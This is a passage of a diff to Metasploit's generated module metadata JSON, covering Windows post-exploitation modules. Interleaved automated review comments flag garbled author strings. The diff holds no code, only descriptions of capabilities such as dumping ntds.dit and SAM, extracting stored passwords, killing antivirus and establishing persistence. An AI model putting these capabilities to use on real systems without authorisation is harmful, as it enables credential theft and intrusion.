"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/enum_putty_saved_sessions.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_putty_saved_sessions",
@@ -217742,7 +220314,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/enum_termserv.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_termserv",
@@ -217813,7 +220385,7 @@
"author": [
"Barry Shteiman <barry@sectorix.com>"
],
"description": "This module will collect information from a Windows-based Apache Tomcat. You will get\n information such as: The installation path, Tomcat version, port, web applications,\n users, passwords, roles, etc.",
"description": "This module will collect information from a Windows-based Apache Tomcat. You will get\n information such as: The installation path, Tomcat version, port, web applications,\n users, passwords, roles, etc.",
"references": [
],
@@ -217823,7 +220395,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/enum_tomcat.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_tomcat",
@@ -217859,7 +220431,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/enum_trusted_locations.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_trusted_locations",
@@ -217887,7 +220459,7 @@
"sinn3r <sinn3r@metasploit.com>",
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module will check the file system for a copy of unattend.xml and/or\n autounattend.xml found in Windows Vista, or newer Windows systems. And then\n extract sensitive information such as usernames and decoded passwords.",
"description": "This module will check the file system for a copy of unattend.xml and/or\n autounattend.xml found in Windows Vista, or newer Windows systems. And then\n extract sensitive information such as usernames and decoded passwords.",
"references": [
"URL-http://technet.microsoft.com/en-us/library/ff715801",
"URL-http://technet.microsoft.com/en-us/library/cc749415(v=ws.10).aspx",
@@ -217899,7 +220471,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-08-16 16:34:50 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/enum_unattend.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_unattend",
@@ -217937,7 +220509,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/post/windows/gather/exchange.rb",
"is_install_path": true,
"ref_name": "windows/gather/exchange",
@@ -217945,6 +220517,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": [
"meterpreter"
@@ -217973,7 +220554,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/file_from_raw_ntfs.rb",
"is_install_path": true,
"ref_name": "windows/gather/file_from_raw_ntfs",
@@ -218009,7 +220590,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/forensics/browser_history.rb",
"is_install_path": true,
"ref_name": "windows/gather/forensics/browser_history",
@@ -218046,7 +220627,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/forensics/duqu_check.rb",
"is_install_path": true,
"ref_name": "windows/gather/forensics/duqu_check",
@@ -218082,7 +220663,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-04-05 11:34:37 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/forensics/enum_drives.rb",
"is_install_path": true,
"ref_name": "windows/gather/forensics/enum_drives",
@@ -218119,7 +220700,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/post/windows/gather/forensics/fanny_bmp_check.rb",
"is_install_path": true,
"ref_name": "windows/gather/forensics/fanny_bmp_check",
@@ -218127,6 +220708,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
],
"Reliability": [
]
},
"session_types": [
"meterpreter",
@@ -218156,7 +220746,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/forensics/imager.rb",
"is_install_path": true,
"ref_name": "windows/gather/forensics/imager",
@@ -218192,7 +220782,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/forensics/nbd_server.rb",
"is_install_path": true,
"ref_name": "windows/gather/forensics/nbd_server",
@@ -218228,7 +220818,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-01-23 15:28:32 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/forensics/recovery_files.rb",
"is_install_path": true,
"ref_name": "windows/gather/forensics/recovery_files",
@@ -218309,7 +220899,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/hashdump.rb",
"is_install_path": true,
"ref_name": "windows/gather/hashdump",
@@ -218347,7 +220937,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-01-18 15:08:30 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/local_admin_search_enum.rb",
"is_install_path": true,
"ref_name": "windows/gather/local_admin_search_enum",
@@ -218383,7 +220973,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/lsa_secrets.rb",
"is_install_path": true,
"ref_name": "windows/gather/lsa_secrets",
@@ -218409,7 +220999,7 @@
"author": [
"Stuart Morgan <stuart.morgan@mwrinfosecurity.com>"
],
"description": "This module will generate a CSV file containing all users and their managers, which can be\n imported into Visio which will render it.",
"description": "This module will generate a CSV file containing all users and their managers, which can be\n imported into Visio which will render it.",
"references": [
],
@@ -218419,7 +221009,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/make_csv_orgchart.rb",
"is_install_path": true,
"ref_name": "windows/gather/make_csv_orgchart",
@@ -218500,7 +221090,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/memory_grep.rb",
"is_install_path": true,
"ref_name": "windows/gather/memory_grep",
@@ -218576,7 +221166,7 @@
"author": [
"Koen Riepe (koen.riepe <Koen Riepe (koen.riepe@fox-it.com)>"
],
"description": "This module uses a powershell script to obtain a copy of the ntds,dit SAM and SYSTEM files on a domain controller.\n It compresses all these files in a cabinet file called All.cab.",
"description": "This module uses a powershell script to obtain a copy of the ntds,dit SAM and SYSTEM files on a domain controller.\n It compresses all these files in a cabinet file called All.cab.",
"references": [
],
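Review bot: "ntds,dit SAM and SYSTEM files" in the ntds_grabber description has the comma and period swapped and should be "ntds.dit, SAM and SYSTEM files"; the unchanged `author` line just above it, "Koen Riepe (koen.riepe <Koen Riepe (koen.riepe@fox-it.com)>", is a garbled name/email pair that should be just "Koen Riepe <koen.riepe@fox-it.com>". Both come from the module source, and the metadata will follow once that is corrected.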
@@ -218586,7 +221176,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-08-20 12:16:26 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/ntds_grabber.rb",
"is_install_path": true,
"ref_name": "windows/gather/ntds_grabber",
@@ -218658,7 +221248,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/outlook.rb",
"is_install_path": true,
"ref_name": "windows/gather/outlook",
@@ -218695,7 +221285,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/phish_windows_credentials.rb",
"is_install_path": true,
"ref_name": "windows/gather/phish_windows_credentials",
@@ -218733,7 +221323,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/psreadline_history.rb",
"is_install_path": true,
"ref_name": "windows/gather/psreadline_history",
@@ -218769,7 +221359,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/resolve_sid.rb",
"is_install_path": true,
"ref_name": "windows/gather/resolve_sid",
@@ -218809,7 +221399,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-07-25 14:51:37 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/screen_spy.rb",
"is_install_path": true,
"ref_name": "windows/gather/screen_spy",
@@ -218845,7 +221435,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-08-20 12:16:26 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/smart_hashdump.rb",
"is_install_path": true,
"ref_name": "windows/gather/smart_hashdump",
@@ -218881,7 +221471,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/tcpnetstat.rb",
"is_install_path": true,
"ref_name": "windows/gather/tcpnetstat",
@@ -218917,7 +221507,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/usb_history.rb",
"is_install_path": true,
"ref_name": "windows/gather/usb_history",
@@ -218953,7 +221543,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/win_privs.rb",
"is_install_path": true,
"ref_name": "windows/gather/win_privs",
@@ -219034,7 +221624,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/word_unc_injector.rb",
"is_install_path": true,
"ref_name": "windows/gather/word_unc_injector",
@@ -219070,7 +221660,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/post/windows/manage/add_user.rb",
"is_install_path": true,
"ref_name": "windows/manage/add_user",
@@ -219078,6 +221668,16 @@
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
],
"SideEffects": [
"ioc-in-logs",
"config-changes"
]
},
"session_types": [
"meterpreter"
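Review bot: `Reliability` is added here as an empty array while `Stability` and `SideEffects` are populated; if the module genuinely has no reliability caveats that is fine, but please confirm it is intentional rather than a placeholder. The key order in this `notes` block (Stability, Reliability, SideEffects) also differs from the block added for execute_dotnet_assembly further down (Stability, SideEffects, Reliability); since this JSON is generated from each module's `Notes` hash, aligning the order in the module sources keeps future diffs of this generated file easier to scan.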
@@ -219106,7 +221706,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/archmigrate.rb",
"is_install_path": true,
"ref_name": "windows/manage/archmigrate",
@@ -219142,7 +221742,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-08-08 01:40:15 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/change_password.rb",
"is_install_path": true,
"ref_name": "windows/manage/change_password",
@@ -219178,7 +221778,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/clone_proxy_settings.rb",
"is_install_path": true,
"ref_name": "windows/manage/clone_proxy_settings",
@@ -219204,7 +221804,7 @@
"author": [
"chao-mu"
],
"description": "This module deletes a local user account from the specified server,\n or the local machine if no server is given.",
"description": "This module deletes a local user account from the specified server,\n or the local machine if no server is given.",
"references": [
],
@@ -219214,7 +221814,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/delete_user.rb",
"is_install_path": true,
"ref_name": "windows/manage/delete_user",
@@ -219305,7 +221905,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/download_exec.rb",
"is_install_path": true,
"ref_name": "windows/manage/download_exec",
@@ -219341,7 +221941,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/driver_loader.rb",
"is_install_path": true,
"ref_name": "windows/manage/driver_loader",
@@ -219377,7 +221977,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-03-20 14:12:01 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/enable_rdp.rb",
"is_install_path": true,
"ref_name": "windows/manage/enable_rdp",
@@ -219413,7 +222013,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/enable_support_account.rb",
"is_install_path": true,
"ref_name": "windows/manage/enable_support_account",
@@ -219440,7 +222040,7 @@
"Nicholas Nam (nick <Nicholas Nam (nick@executionflow.org)>",
"RageLtMan <rageltman@sempervictus>"
],
"description": "This module will execute a powershell script in a meterpreter session.\n The user may also enter text substitutions to be made in memory before execution.\n Setting VERBOSE to true will output both the script prior to execution and the results.",
"description": "This module will execute a powershell script in a meterpreter session.\n The user may also enter text substitutions to be made in memory before execution.\n Setting VERBOSE to true will output both the script prior to execution and the results.",
"references": [
],
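Review bot: the author entry "Nicholas Nam (nick <Nicholas Nam (nick@executionflow.org)>" in the context above has unbalanced parentheses and repeats the name inside the angle brackets, so it is not a plain "Name <email>" entry; the description lines in this hunk render identically before and after, so the change appears to be whitespace-only and this is a convenient point to fix the author string in the module source so the regenerated metadata is clean.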
@@ -219450,7 +222050,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/exec_powershell.rb",
"is_install_path": true,
"ref_name": "windows/manage/exec_powershell",
@@ -219486,7 +222086,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/post/windows/manage/execute_dotnet_assembly.rb",
"is_install_path": true,
"ref_name": "windows/manage/execute_dotnet_assembly",
@@ -219494,6 +222094,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": [
"meterpreter"
@@ -219568,7 +222177,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/hashcarve.rb",
"is_install_path": true,
"ref_name": "windows/manage/hashcarve",
@@ -219605,7 +222214,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/ie_proxypac.rb",
"is_install_path": true,
"ref_name": "windows/manage/ie_proxypac",
@@ -219641,7 +222250,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/inject_ca.rb",
"is_install_path": true,
"ref_name": "windows/manage/inject_ca",
@@ -219677,7 +222286,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/inject_host.rb",
"is_install_path": true,
"ref_name": "windows/manage/inject_host",
@@ -219714,7 +222323,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-02-24 20:24:57 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/post/windows/manage/install_python.rb",
"is_install_path": true,
"ref_name": "windows/manage/install_python",
@@ -219722,6 +222331,16 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
]
},
"session_types": [
"meterpreter"
@@ -219740,7 +222359,7 @@
"author": [
"Michael Long <bluesentinel@protonmail.com>"
],
"description": "This module installs OpenSSH server and client for Windows using PowerShell.\n SSH on Windows can provide pentesters persistent access to a secure interactive terminal, interactive filesystem access, and port forwarding over SSH.",
"description": "This module installs OpenSSH server and client for Windows using PowerShell.\n SSH on Windows can provide pentesters persistent access to a secure interactive terminal, interactive filesystem access, and port forwarding over SSH.",
"references": [
"URL-https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_overview",
"URL-https://github.com/PowerShell/openssh-portable"
@@ -219751,7 +222370,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-01-19 19:51:44 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/install_ssh.rb",
"is_install_path": true,
"ref_name": "windows/manage/install_ssh",
@@ -219791,7 +222410,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-09-07 14:01:53 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/killav.rb",
"is_install_path": true,
"ref_name": "windows/manage/killav",
@@ -219839,7 +222458,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/migrate.rb",
"is_install_path": true,
"ref_name": "windows/manage/migrate",
@@ -219875,7 +222494,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/mssql_local_auth_bypass.rb",
"is_install_path": true,
"ref_name": "windows/manage/mssql_local_auth_bypass",
@@ -219912,7 +222531,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/multi_meterpreter_inject.rb",
"is_install_path": true,
"ref_name": "windows/manage/multi_meterpreter_inject",
@@ -219948,7 +222567,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/nbd_server.rb",
"is_install_path": true,
"ref_name": "windows/manage/nbd_server",
@@ -219984,7 +222603,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/peinjector.rb",
"is_install_path": true,
"ref_name": "windows/manage/peinjector",
@@ -220020,7 +222639,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-10-01 17:54:59 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/persistence_exe.rb",
"is_install_path": true,
"ref_name": "windows/manage/persistence_exe",
@@ -220056,7 +222675,7 @@
"author": [
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "This module uses the PortProxy interface from netsh to set up\n port forwarding persistently (even after reboot). PortProxy\n supports TCP IPv4 and IPv6 connections.",
"description": "This module uses the PortProxy interface from netsh to set up\n port forwarding persistently (even after reboot). PortProxy\n supports TCP IPv4 and IPv6 connections.",
"references": [
],
@@ -220066,7 +222685,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/portproxy.rb",
"is_install_path": true,
"ref_name": "windows/manage/portproxy",
@@ -220102,7 +222721,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/powershell/build_net_code.rb",
"is_install_path": true,
"ref_name": "windows/manage/powershell/build_net_code",
@@ -220139,7 +222758,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-08-08 18:00:36 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/powershell/exec_powershell.rb",
"is_install_path": true,
"ref_name": "windows/manage/powershell/exec_powershell",
@@ -220166,7 +222785,7 @@
"Ben Turner benpturner <Ben Turner benpturner@yahoo.com>",
"Dave Hardy davehardy20 <Dave Hardy davehardy20@gmail.com>"
],
"description": "This module will download and execute one or more PowerShell scripts\n over a present powershell session.\n Setting VERBOSE to true will show the stager results.",
"description": "This module will download and execute one or more PowerShell scripts\n over a present powershell session.\n Setting VERBOSE to true will show the stager results.",
"references": [
],
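Review bot: both author entries here ("Ben Turner benpturner <Ben Turner benpturner@yahoo.com>" and "Dave Hardy davehardy20 <Dave Hardy davehardy20@gmail.com>") put the full name and handle inside the angle brackets, so the bracketed part is not a bare e-mail address as in the other entries in this file; the changed description lines render identically, so the edit is presumably whitespace-only and the author strings could be corrected in the module source in the same pass.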
@@ -220176,7 +222795,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-08-08 18:00:36 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/powershell/load_script.rb",
"is_install_path": true,
"ref_name": "windows/manage/powershell/load_script",
@@ -220202,7 +222821,7 @@
"author": [
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "This module initiates a PPTP connection to a remote machine (VPN server). Once\n the tunnel is created we can use it to force the victim traffic to go through the\n server getting a man in the middle attack. Be sure to allow forwarding and\n masquerading on the VPN server (mitm).",
"description": "This module initiates a PPTP connection to a remote machine (VPN server). Once\n the tunnel is created we can use it to force the victim traffic to go through the\n server getting a man in the middle attack. Be sure to allow forwarding and\n masquerading on the VPN server (mitm).",
"references": [
"URL-https://www.youtube.com/watch?v=vdppEZjMPCM&hd=1"
],
@@ -220212,7 +222831,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-01-23 15:28:32 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/pptp_tunnel.rb",
"is_install_path": true,
"ref_name": "windows/manage/pptp_tunnel",
@@ -220249,7 +222868,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/priv_migrate.rb",
"is_install_path": true,
"ref_name": "windows/manage/priv_migrate",
@@ -220285,7 +222904,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-03-10 18:03:35 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/pxeexploit.rb",
"is_install_path": true,
"ref_name": "windows/manage/pxeexploit",
@@ -220322,7 +222941,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/reflective_dll_inject.rb",
"is_install_path": true,
"ref_name": "windows/manage/reflective_dll_inject",
@@ -220358,7 +222977,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/remove_ca.rb",
"is_install_path": true,
"ref_name": "windows/manage/remove_ca",
@@ -220394,7 +223013,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/remove_host.rb",
"is_install_path": true,
"ref_name": "windows/manage/remove_host",
@@ -220430,7 +223049,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/rid_hijack.rb",
"is_install_path": true,
"ref_name": "windows/manage/rid_hijack",
@@ -220502,7 +223121,7 @@
"author": [
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "This module enables the Remote Packet Capture System (rpcapd service)\n included in the default installation of Winpcap. The module allows you to set up\n the service in passive or active mode (useful if the client is behind a firewall).\n If authentication is enabled you need a local user account to capture traffic.\n PORT will be used depending of the mode configured.",
"description": "This module enables the Remote Packet Capture System (rpcapd service)\n included in the default installation of Winpcap. The module allows you to set up\n the service in passive or active mode (useful if the client is behind a firewall).\n If authentication is enabled you need a local user account to capture traffic.\n PORT will be used depending of the mode configured.",
"references": [
],
@@ -220512,7 +223131,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/rpcapd_start.rb",
"is_install_path": true,
"ref_name": "windows/manage/rpcapd_start",
@@ -220548,7 +223167,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/run_as.rb",
"is_install_path": true,
"ref_name": "windows/manage/run_as",
@@ -220584,7 +223203,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/run_as_psh.rb",
"is_install_path": true,
"ref_name": "windows/manage/run_as_psh",
@@ -220620,7 +223239,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/sdel.rb",
"is_install_path": true,
"ref_name": "windows/manage/sdel",
@@ -220656,7 +223275,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-03-10 18:03:35 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/shellcode_inject.rb",
"is_install_path": true,
"ref_name": "windows/manage/shellcode_inject",
@@ -220692,7 +223311,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/sshkey_persistence.rb",
"is_install_path": true,
"ref_name": "windows/manage/sshkey_persistence",
@@ -220719,7 +223338,7 @@
"author": [
"OJ Reeves"
],
